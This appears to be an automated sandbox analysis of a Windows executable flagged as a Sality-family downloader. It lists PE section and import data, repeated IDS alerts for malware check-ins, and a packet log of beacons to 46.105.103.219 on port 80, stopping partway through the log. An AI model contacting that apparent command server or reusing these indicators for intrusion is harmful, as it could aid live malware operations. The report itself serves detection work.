                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x24880x30.data
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x3e00x400c9ed0710f013ee6bf9ff10155e1087c8False0.7060546875data5.672115596068419IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .data0x20000x110000x10600248e62319e676cfbcb06c1298c439fefFalse0.9951991889312977data7.988084869146433IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          DLLImport
                                                                                                          msvcrt.dll_iob, printf, fopen, fprintf, fclose, exit, fread, ferror, _controlfp, __set_app_type, __getmainargs
                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2024-11-26T11:42:11.899329+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44973246.105.103.21980TCP
                                                                                                          2024-11-26T11:42:11.899329+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44973246.105.103.21980TCP
                                                                                                          2024-11-26T11:42:16.743004+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44973546.105.103.21980TCP
                                                                                                          2024-11-26T11:42:16.743004+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44973546.105.103.21980TCP
                                                                                                          2024-11-26T11:42:21.684084+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44973746.105.103.21980TCP
                                                                                                          2024-11-26T11:42:21.684084+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44973746.105.103.21980TCP
                                                                                                          2024-11-26T11:42:26.565787+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44974246.105.103.21980TCP
                                                                                                          2024-11-26T11:42:26.565787+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44974246.105.103.21980TCP
                                                                                                          2024-11-26T11:42:31.368788+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44974546.105.103.21980TCP
                                                                                                          2024-11-26T11:42:31.368788+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44974546.105.103.21980TCP
                                                                                                          2024-11-26T11:42:36.200224+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44974646.105.103.21980TCP
                                                                                                          2024-11-26T11:42:36.200224+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44974646.105.103.21980TCP
                                                                                                          2024-11-26T11:42:41.050525+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44974746.105.103.21980TCP
                                                                                                          2024-11-26T11:42:41.050525+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44974746.105.103.21980TCP
                                                                                                          2024-11-26T11:42:45.964254+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44974846.105.103.21980TCP
                                                                                                          2024-11-26T11:42:45.964254+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44974846.105.103.21980TCP
                                                                                                          2024-11-26T11:42:50.728667+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44974946.105.103.21980TCP
                                                                                                          2024-11-26T11:42:50.728667+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44974946.105.103.21980TCP
                                                                                                          2024-11-26T11:42:55.543033+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44975046.105.103.21980TCP
                                                                                                          2024-11-26T11:42:55.543033+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44975046.105.103.21980TCP
                                                                                                          2024-11-26T11:43:00.519992+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44975246.105.103.21980TCP
                                                                                                          2024-11-26T11:43:00.519992+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44975246.105.103.21980TCP
                                                                                                          2024-11-26T11:43:05.291200+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44975946.105.103.21980TCP
                                                                                                          2024-11-26T11:43:05.291200+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44975946.105.103.21980TCP
                                                                                                          2024-11-26T11:43:10.085351+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44977446.105.103.21980TCP
                                                                                                          2024-11-26T11:43:10.085351+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44977446.105.103.21980TCP
                                                                                                          2024-11-26T11:43:14.964564+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44978646.105.103.21980TCP
                                                                                                          2024-11-26T11:43:14.964564+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44978646.105.103.21980TCP
                                                                                                          2024-11-26T11:43:19.753858+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44979746.105.103.21980TCP
                                                                                                          2024-11-26T11:43:19.753858+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44979746.105.103.21980TCP
                                                                                                          2024-11-26T11:43:24.934464+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44980846.105.103.21980TCP
                                                                                                          2024-11-26T11:43:24.934464+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44980846.105.103.21980TCP
                                                                                                          2024-11-26T11:43:30.379426+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44981946.105.103.21980TCP
                                                                                                          2024-11-26T11:43:30.379426+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44981946.105.103.21980TCP
                                                                                                          2024-11-26T11:43:35.273608+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44983446.105.103.21980TCP
                                                                                                          2024-11-26T11:43:35.273608+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44983446.105.103.21980TCP
                                                                                                          2024-11-26T11:43:40.463057+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44984646.105.103.21980TCP
                                                                                                          2024-11-26T11:43:40.463057+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44984646.105.103.21980TCP
                                                                                                          2024-11-26T11:43:45.715241+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44985746.105.103.21980TCP
                                                                                                          2024-11-26T11:43:45.715241+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44985746.105.103.21980TCP
                                                                                                          2024-11-26T11:43:50.655396+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44986846.105.103.21980TCP
                                                                                                          2024-11-26T11:43:50.655396+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44986846.105.103.21980TCP
                                                                                                          2024-11-26T11:43:55.459153+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44988046.105.103.21980TCP
                                                                                                          2024-11-26T11:43:55.459153+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44988046.105.103.21980TCP
                                                                                                          2024-11-26T11:44:00.276318+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44989146.105.103.21980TCP
                                                                                                          2024-11-26T11:44:00.276318+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44989146.105.103.21980TCP
                                                                                                          2024-11-26T11:44:05.354825+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44990246.105.103.21980TCP
                                                                                                          2024-11-26T11:44:05.354825+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44990246.105.103.21980TCP
                                                                                                          2024-11-26T11:44:11.156348+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44991446.105.103.21980TCP
                                                                                                          2024-11-26T11:44:11.156348+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44991446.105.103.21980TCP
                                                                                                          2024-11-26T11:44:16.040513+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44992546.105.103.21980TCP
                                                                                                          2024-11-26T11:44:16.040513+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44992546.105.103.21980TCP
                                                                                                          2024-11-26T11:44:20.885968+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44994046.105.103.21980TCP
                                                                                                          2024-11-26T11:44:20.885968+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44994046.105.103.21980TCP
                                                                                                          2024-11-26T11:44:25.781545+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44995146.105.103.21980TCP
                                                                                                          2024-11-26T11:44:25.781545+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44995146.105.103.21980TCP
                                                                                                          2024-11-26T11:44:30.615302+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44996246.105.103.21980TCP
                                                                                                          2024-11-26T11:44:30.615302+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44996246.105.103.21980TCP
                                                                                                          2024-11-26T11:44:35.444529+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44997346.105.103.21980TCP
                                                                                                          2024-11-26T11:44:35.444529+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44997346.105.103.21980TCP
                                                                                                          2024-11-26T11:44:40.366730+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44998446.105.103.21980TCP
                                                                                                          2024-11-26T11:44:40.366730+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44998446.105.103.21980TCP
                                                                                                          2024-11-26T11:44:45.244056+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44999546.105.103.21980TCP
                                                                                                          2024-11-26T11:44:45.244056+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.44999546.105.103.21980TCP
                                                                                                          2024-11-26T11:44:50.147625+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.45000646.105.103.21980TCP
                                                                                                          2024-11-26T11:44:50.147625+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.45000646.105.103.21980TCP
                                                                                                          2024-11-26T11:44:55.298067+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.45001946.105.103.21980TCP
                                                                                                          2024-11-26T11:44:55.298067+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.45001946.105.103.21980TCP
                                                                                                          2024-11-26T11:45:00.538110+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.45003246.105.103.21980TCP
                                                                                                          2024-11-26T11:45:00.538110+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.45003246.105.103.21980TCP
                                                                                                          2024-11-26T11:45:05.399094+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.45004246.105.103.21980TCP
                                                                                                          2024-11-26T11:45:05.399094+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.45004246.105.103.21980TCP
                                                                                                          2024-11-26T11:45:10.307722+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.45004346.105.103.21980TCP
                                                                                                          2024-11-26T11:45:10.307722+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.45004346.105.103.21980TCP
                                                                                                          2024-11-26T11:45:15.407489+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.45004446.105.103.21980TCP
                                                                                                          2024-11-26T11:45:15.407489+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.45004446.105.103.21980TCP
                                                                                                          2024-11-26T11:45:20.712933+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.45004546.105.103.21980TCP
                                                                                                          2024-11-26T11:45:20.712933+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.45004546.105.103.21980TCP
                                                                                                          2024-11-26T11:45:25.593889+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.45004646.105.103.21980TCP
                                                                                                          2024-11-26T11:45:25.593889+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.45004646.105.103.21980TCP
                                                                                                          2024-11-26T11:45:30.698514+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.45004746.105.103.21980TCP
                                                                                                          2024-11-26T11:45:30.698514+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.45004746.105.103.21980TCP
                                                                                                          2024-11-26T11:45:35.698392+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.45004846.105.103.21980TCP
                                                                                                          2024-11-26T11:45:35.698392+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.45004846.105.103.21980TCP
                                                                                                          2024-11-26T11:45:41.155369+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.45004946.105.103.21980TCP
                                                                                                          2024-11-26T11:45:41.155369+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.45004946.105.103.21980TCP
                                                                                                          2024-11-26T11:45:46.228245+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.45005046.105.103.21980TCP
                                                                                                          2024-11-26T11:45:46.228245+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.45005046.105.103.21980TCP
                                                                                                          2024-11-26T11:45:51.090228+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.45005146.105.103.21980TCP
                                                                                                          2024-11-26T11:45:51.090228+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.45005146.105.103.21980TCP
                                                                                                          2024-11-26T11:45:56.062306+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.45005246.105.103.21980TCP
                                                                                                          2024-11-26T11:45:56.062306+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.45005246.105.103.21980TCP
                                                                                                          2024-11-26T11:46:00.949414+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.45005346.105.103.21980TCP
                                                                                                          2024-11-26T11:46:00.949414+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.45005346.105.103.21980TCP
                                                                                                          2024-11-26T11:46:05.871611+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.45005446.105.103.21980TCP
                                                                                                          2024-11-26T11:46:05.871611+01002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.45005446.105.103.21980TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Nov 26, 2024 11:42:09.573647976 CET4973280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:09.693665981 CET804973246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:09.708708048 CET4973280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:09.709120989 CET4973280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:09.829193115 CET804973246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:11.894484997 CET804973246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:11.899328947 CET4973280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:11.899837017 CET4973280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:12.019917965 CET804973246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:14.415056944 CET4973580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:14.535504103 CET804973546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:14.553657055 CET4973580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:14.559591055 CET4973580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:14.683326006 CET804973546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:16.733026028 CET804973546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:16.743004084 CET4973580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:16.858025074 CET4973580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:16.981748104 CET804973546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:19.378226042 CET4973780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:19.498769045 CET804973746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:19.498843908 CET4973780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:19.505198002 CET4973780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:19.625518084 CET804973746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:21.684014082 CET804973746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:21.684083939 CET4973780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:21.692703962 CET4973780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:21.812678099 CET804973746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:24.213871002 CET4974280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:24.336039066 CET804974246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:24.336152077 CET4974280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:24.336519003 CET4974280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:24.456662893 CET804974246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:26.565464973 CET804974246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:26.565787077 CET4974280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:26.567673922 CET4974280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:26.687623024 CET804974246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:29.042373896 CET4974580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:29.163480043 CET804974546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:29.163583994 CET4974580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:29.163791895 CET4974580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:29.285742044 CET804974546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:31.368669033 CET804974546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:31.368788004 CET4974580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:31.369462013 CET4974580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:31.492925882 CET804974546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:33.874686003 CET4974680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:33.995029926 CET804974646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:33.995115995 CET4974680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:33.997087955 CET4974680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:34.117706060 CET804974646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:36.198873997 CET804974646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:36.200223923 CET4974680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:36.200386047 CET4974680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:36.324579000 CET804974646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:38.685951948 CET4974780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:38.809380054 CET804974746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:38.809580088 CET4974780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:38.809829950 CET4974780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:38.932297945 CET804974746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:41.050419092 CET804974746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:41.050524950 CET4974780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:41.053174973 CET4974780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:41.173146963 CET804974746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:43.653656006 CET4974880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:43.814462900 CET804974846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:43.814559937 CET4974880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:43.838835001 CET4974880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:44.166307926 CET804974846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:45.964083910 CET804974846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:45.964253902 CET4974880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:45.964893103 CET4974880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:46.085395098 CET804974846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:48.463747978 CET4974980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:48.585320950 CET804974946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:48.585402012 CET4974980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:48.585593939 CET4974980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:48.706002951 CET804974946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:50.728599072 CET804974946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:50.728667021 CET4974980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:50.728764057 CET4974980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:50.848706961 CET804974946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:53.245006084 CET4975080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:53.365087032 CET804975046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:53.365225077 CET4975080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:53.365581036 CET4975080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:53.485697985 CET804975046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:55.542956114 CET804975046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:55.543032885 CET4975080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:55.543245077 CET4975080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:55.663814068 CET804975046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:58.213360071 CET4975280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:58.333405018 CET804975246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:58.333492041 CET4975280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:58.333689928 CET4975280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:58.453633070 CET804975246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:00.519923925 CET804975246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:00.519992113 CET4975280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:00.520348072 CET4975280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:00.644011974 CET804975246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:03.013792038 CET4975980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:03.133718014 CET804975946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:03.133788109 CET4975980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:03.133934975 CET4975980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:03.254365921 CET804975946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:05.291141033 CET804975946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:05.291199923 CET4975980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:05.291646004 CET4975980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:05.412264109 CET804975946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:07.793997049 CET4977480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:07.914283991 CET804977446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:07.914402008 CET4977480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:07.914680004 CET4977480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:08.035574913 CET804977446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:10.085289001 CET804977446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:10.085350990 CET4977480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:10.087786913 CET4977480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:10.207858086 CET804977446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:12.697732925 CET4978680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:12.819538116 CET804978646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:12.819608927 CET4978680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:12.820173979 CET4978680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:12.940701962 CET804978646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:14.963692904 CET804978646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:14.964564085 CET4978680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:14.965327978 CET4978680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:15.086225033 CET804978646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:17.449290991 CET4979780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:17.571480036 CET804979746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:17.571558952 CET4979780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:17.573354006 CET4979780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:17.693694115 CET804979746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:19.753793955 CET804979746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:19.753858089 CET4979780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:19.849225998 CET4979780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:19.969750881 CET804979746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:22.641454935 CET4980880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:22.761518955 CET804980846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:22.761595964 CET4980880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:22.767539978 CET4980880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:22.888156891 CET804980846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:24.934201002 CET804980846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:24.934463978 CET4980880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:24.999655008 CET4980880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:25.119735003 CET804980846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:28.030862093 CET4981980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:28.153805971 CET804981946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:28.153912067 CET4981980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:28.155122995 CET4981980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:28.279392004 CET804981946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:30.379323959 CET804981946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:30.379426003 CET4981980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:30.380247116 CET4981980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:30.502048969 CET804981946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:32.925575972 CET4983480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:33.045810938 CET804983446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:33.046086073 CET4983480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:33.046200037 CET4983480192.168.2.446.105.103.219
